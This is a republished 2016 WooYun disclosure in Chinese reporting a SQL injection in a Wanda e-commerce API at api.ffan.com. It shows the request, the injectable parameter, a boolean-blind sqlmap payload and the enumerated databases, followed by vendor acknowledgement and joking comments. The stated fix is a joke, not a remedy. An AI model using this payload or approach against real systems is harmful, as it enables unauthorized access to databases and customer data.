万达某电商电商业务SQL注入

admin
admin
admin
139544
文章
114
评论
2017年4月23日03:36:25评论354 views字数 213阅读0分42秒阅读模式
摘要

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

漏洞概要 关注数(14) 关注此漏洞

缺陷编号: WooYun-2016-193931

漏洞标题: 万达某电商电商业务SQL注入

相关厂商: 万达电商

漏洞作者: zzR万达某电商电商业务SQL注入

提交时间: 2016-04-08 16:38

公开时间: 2016-05-26 15:50

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 12

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 东方红DOTA安全联盟-sql注入

1人收藏

漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

简要描述:

东方红DOTA安全联盟-来一发

详细说明:

GET http://api.ffan.com/ffan/v1/appskin/appSkins?FFClientType=1&FFClientVersion=32100000&FFUDID=15440&ddId=55&pLoginToken=bc5a89c493de&puid=7A3A3&size=750_1334&version=1&wdId=0f1cf59b3ff HTTP/1.1

Host: api.ffan.com

Accept: */*

Proxy-Connection: keep-alive

sqlmap resumed the following injection point(s) from stored session:

---

back-end DBMS: MySQL 5

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: FFClientType (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: FFClientType=1 AND 6831=6831&FFClientVersion=32100000&FFUDID=15000000068222440&ddId=ded10ed85e3c8af56018ad2f9b2f557a304d6155&pLoginToken=bc5ad73a25a6fb59e3a26fe289c493de&puid=7C325CCEC0484391953762A94DABA3A3&size=750_1334&version=1&wdId=9a100c5a595de2696d7670f1cf59b3ff

Vector: AND [INFERENCE]

---

back-end DBMS: MySQL >= 5.0.0

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: FFClientType (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: FFClientType=1 AND 6831=6831&FFClientVersion=32100000&FFUDID=15000000068222440&ddId=ded10ed85e3c8af56018ad2f9b2f557a304d6155&pLoginToken=bc5ad73a25a6fb59e3a26fe289c493de&puid=7C325CCEC0484391953762A94DABA3A3&size=750_1334&version=1&wdId=9a100c5a595de2696d7670f1cf59b3ff

Vector: AND [INFERENCE]

---

back-end DBMS: MySQL >= 5.0.0

available databases [3]:

[*] ffan

[*] information_schema

[*] test

漏洞证明:

万达某电商电商业务SQL注入

万达某电商电商业务SQL注入

万达某电商电商业务SQL注入

好像是主库ffan

跑起来好费劲~

修复方案:

电影票能修复该问题

版权声明:转载请注明来源 zzR@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2016-04-11 15:43

厂商回复:

感谢zzR同学的关注与贡献,马上通知业务整改。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-08 16:39 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    1

    前排顶表哥。

  2. 2016-04-08 16:48 | 高小厨 万达某电商电商业务SQL注入 ( 普通白帽子 | Rank:998 漏洞数:91 | 不会吹牛的小二不是好厨子!)

    1

    想思聪了?

  3. 2016-04-08 17:03 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    1

    后排顶一下。

  4. 2016-04-08 17:45 | Mr.li ( 普通白帽子 | Rank:106 漏洞数:36 | 爱萌妹子的骚年~)

    1

    表哥最近一溜全是 万达,是不是思聪抢你东西了~

  5. 2016-04-08 17:49 | Focusstart 万达某电商电商业务SQL注入 ( 普通白帽子 | Rank:830 漏洞数:207 | 努力让某某某成为最幸福的女人!)

    1

    Good Jb,baby

  6. 2016-04-08 19:23 | zzR 万达某电商电商业务SQL注入 ( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红**联盟欢迎你-0-)

    1

    @高小厨 说,葱葱是不是被你们藏起来了。。``

  7. 2016-04-11 17:03 | answer 万达某电商电商业务SQL注入 ( 普通白帽子 | Rank:453 漏洞数:54 | 答案)

    1

    专注万达20年

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin